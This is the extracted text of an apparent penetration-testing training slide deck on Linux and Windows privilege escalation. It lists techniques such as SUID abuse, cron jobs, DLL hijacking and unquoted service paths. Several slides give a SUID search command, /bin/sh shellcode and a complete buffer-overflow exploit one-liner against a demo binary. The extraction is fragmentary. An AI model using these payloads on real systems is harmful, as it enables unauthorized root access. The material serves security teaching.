3. Pre Exploitation
Exploitation
Post
Exploitation
# “Privilege Escalation”
Information gathering
Scanning
Enumeration
Remote Exploitation
- Gain system access
- Gain information
- Denial of services
- Privilege Escalation
Local Exploitation
- Bypass Restriction
- Privilege Escalation
Gathering Sensitive Info
Manage System/Service
Pivoting
Windows
4. # “Privilege Escalation”
NT AUTHORITYSystem
Administrators
Power Users
Users
Root
Sudoer
UsersService Users Service Users
Windows Unix
5. # “Privilege Escalation”
• Vertical privilege escalation -> Gain higher privilege
• Horizontal privilege escalation -> Gain access with other accounts
Users Service Users
john Apache, mysql
Users john
Root
6. # “Privilege Escalation”
NT AUTHORITYSystem
Administrators
Power Users
Users UsersService Users
Windows
Anonymous FTP
Webshell
LocalExploit
Vul. Service Exp
7. # “Privilege Escalation”
NT AUTHORITYSystem
Administrators
Power Users
UsersService Users
Windows
Unauthorized
Access
LocalExploit
Users
8. # “Privilege Escalation”
NT AUTHORITYSystem
Administrators
Power Users
UsersService Users
Windows
Unauthorized
Access
LocalExploit
Users
16. # “Privilege Escalation” Ways for Linux
• Remote Exploit to vulnerable service running by high privilege users
• Weak password of high privilege users
• Credential store in file with weak permission
• Configurations, Logs files
• History
• Env , $PATH
• Shell Escape(restrict shell ,chroot)
• Vulnerable Applications / Programs / Services use high privilege users
• Weak permission file of Jobs/Task run by high privilege users
• Sudoer
• System Misconfiguration
• Kernel Exploitation
• Remote Exploitation by local host
17. # “Privilege Escalation” Ways for Linux
• Remote Exploit to vulnerable service running by high privilege users
18. # “Privilege Escalation” Ways for Linux
• Remote Exploit to vulnerable service running by high privilege users
FILE_SERVER
#ps –ef | grep root
root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D
19. # “Privilege Escalation” Ways for Linux
• Weak password of high privilege users
Maybe use the
password similar
to username
Maybe use weak
password
root
Password
P@ssw0rd
….
20. # “Privilege Escalation” Ways for Linux
• Credential store in file with weak permission
• Configurations, Logs files
• History
• Env , $PATH
22. # “Privilege Escalation” Ways for Linux
• Restricted Shell Escape
https://netsec.ws/?p=337https://0feci.wordpress.com/tag/escaping-restricted-shell-bypass/
23. # “Privilege Escalation” Ways for Linux
• Vulnerable Applications / Programs / Services use high privilege users
• Characteristic of vulnerable program
• Has permission “root” as user or group
• Has set SUID, GUID
• Can perform Overflow
• Use Static Libc. (Nice to have)
24. # “Privilege Escalation” Ways for Linux
• Vulnerable Applications / Programs / Services use high privilege users
• Characteristic of vulnerable program
• Has permission “root” as user or group
• Has set SUID, GUID
list="$(find / -perm -4000 -o -perm -2000)";for i in $list; do ls -al $i; done
ls –R / | grep “wsr” | grep “root”
25. # “Privilege Escalation” Ways for Linux
• Vulnerable Applications / Programs / Services use high privilege users
26. # “Privilege Escalation” Ways for Linux
• Vulnerable Applications / Programs / Services use high privilege users
• Characteristic of vulnerable program
• Can perform Overflow
27. # “Privilege Escalation” Ways for Linux
• Vulnerable Applications / Programs / Services use high privilege users
Check buffer overflow position
28. # “Privilege Escalation” Ways for Linux
• Vulnerable Applications / Programs / Services use high privilege users
Check buffer overflow position
29. #objdump –d vul_app | grep “jmp” | grep “esp”
# ROPgadget --binary vul_app --only "jmp“ | grep esp
0x08049f0f : jmp %esp
# “Privilege Escalation” Ways for Linux
• Vulnerable Applications / Programs / Services use high privilege users
30. # “Privilege Escalation” Ways for Linux
• Vulnerable Applications / Programs / Services use high privilege users
Shellcode
system(“/bin//sh”)
Shellcode=
“x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90
x31xC0x50x68x2Fx2Fx73x68x68x2Fx62x69x6Ex89xE3x50x53x89xE1xB0x0BxCDx80”
jmp %esp
0x08049f0f
esp
31. #python –c ‘ “A”*612 + “x0fx49x04x08” +
“x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90
x31xC0x50x68x2Fx2Fx73x68x68x2Fx62x69x6Ex89xE3x50x53x89xE1xB0x0BxCDx80”’ | ./vul_app
# “Privilege Escalation” Ways for Linux
Privilege is dropped
32. # “Privilege Escalation” Ways for Linux
• Vulnerable Applications / Programs / Services use high privilege users
#nano /tmp/sh.c
33. # “Privilege Escalation” Ways for Linux
#python –c ‘ “A”*612 + “x0fx49x04x08” +
“x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90
x31xC0x50x68x2Fx2Fx73x68x68x2Fx74x6dx70x89xE3x50x53x89xE1xB0x0BxCDx80”’ | ./vul_app
tmp
• Vulnerable Applications / Programs / Services use high privilege users
35. # “Privilege Escalation” Ways for Linux
The real life is not easy !!!!
• Canary (Buffer overflow detection)
• Executable Stack Prevention (NX , DEP)
• Address Space Layout Randomization (ASLR)
36. # “Privilege Escalation” Ways for Linux
But It’s possible to bypass !!!
• Canary (Buffer overflow detection) -> Canary Repair
• Executable Stack Prevention (NX , DEP) -> Ret-2-Libc , ROP
• Address Space Layout Randomization (ASLR) -> Static Lib, App Warp Up
https://www.slideshare.net/ammarit/unix-executable-buffer-overflow?qid=3ae3efd0-d1b4-4f3c-b85c-
82b1d063aa6b&v=&b=&from_search=1
37. # “Privilege Escalation” Ways for Linux
• Weak permission file of Jobs/Task run by high privilege users
/etc/cron.d
/etc/crontab
/etc/cron.hourly
/etc/cron.daily
/etc/cron.weekly
/etc/cron.monthly
# ls -Ral /etc/cron*
38. # “Privilege Escalation” Ways for Linux
• Weak permission file of Jobs/Task run by high privilege users
Reverse shell
39. # “Privilege Escalation” Ways for Linux
• Weak permission file of Jobs/Task run by high privilege users
45. # “Privilege Escalation” Ways for Linux
• Kernel Exploitation (Trick)
Ex: Linux version 2.6.9-89.EL
• Compile exploit on the target system on target like environment
• Metasploitable is good exploit compile environment
46. # “Privilege Escalation” Ways for Linux
#ps –ef | grep root
root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D
• Remote Exploitation by local host
127.0.0.1
47. # “Privilege Escalation” Ways for Linux
• [Linux Privilege Escalation Scripts and Commands]
Ref : https://netsec.ws/?p=309
LinEnum
http://www.rebootuser.com/?p=1758
LinuxPrivChecker
http://www.securitysift.com/download/linuxprivchecker.py
Basic-linux-privilege-escalation
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation
55. Low Priv
Other Unix Servers
Dirty Cow
Default
password
Crack root pass
root
Bypass Restrict Shell
CMC
# “Privilege Escalation” Ways for Linux
• Case Study :
56. # “Privilege Escalation” Ways for Windows
• Remote Exploit to vulnerable service running by high privilege users
• Weak password of high privilege users
• Credential store in file and Registry
• Vulnerable Applications / Programs / Services use high privilege users
• Weak permission file of Jobs/Task run by high privilege users
• System Misconfiguration
• Kernel Exploitation
• Pass-the-hash
• DLL Injection
• DLL Hijacking
• Remote Exploitation by local host
• Hotpotato
• Many more…
57. # Remote Exploit to escalate privilege
• Exploit to vulnerable service running with high privilege users
58. # Remote Exploit to escalate privilege
• Exploit to vulnerable service running with high privilege users
Credit : Worawit Wangwarunyoo (sleepya)
59. • Exploit to vulnerability of the service misconfigure running with high privilege users
# “Privilege Escalation” Ways for Windows
60. • Exploit to vulnerability of the service misconfigure running with high privilege users
# “Privilege Escalation” Ways for Windows
61. # Remote Exploit to escalate privilege
• Exploit to vulnerability of the service misconfigure running with high privilege users
WebShell
73. # Remote Exploit to escalate privilege
http://www.labofapenetrationtester.com/2015/05/
dumping-passwords-in-plain-on-windows-8-1.html
Windows Server 2012
83. # “Privilege Escalation” Ways for Windows
Ref:https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
• Unquoted Service Paths
When Windows attempts to run this service, it will look at the following paths in order and will run the first
EXE that it will find:
84. # “Privilege Escalation” Ways for Windows
Ref:https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
• Unquoted Service Paths
92. • DLL Hijacking
# “Privilege Escalation” Ways for Windows
https://msitpros.com/?p=2012
The way that Windows loads DLLs then, is to search the following directories in this order:
– The directory from which the application loaded
– C:WindowsSystem32
– C:WindowsSystem
– C:Windows
– The current working directory
– Directories in the system PATH environment variable
– Directories in the user PATH environment variable
https://www.gracefulsecurity.com/privesc-dll-hijacking/
93. • DLL Hijacking
# “Privilege Escalation” Ways for Windows
https://pentestlab.blog/2017/03/27/dll-hijacking/
94. # “Privilege Escalation” Ways for Windows
• DLL Hijacking
https://pentestlab.blog/2017/03/27/dll-hijacking/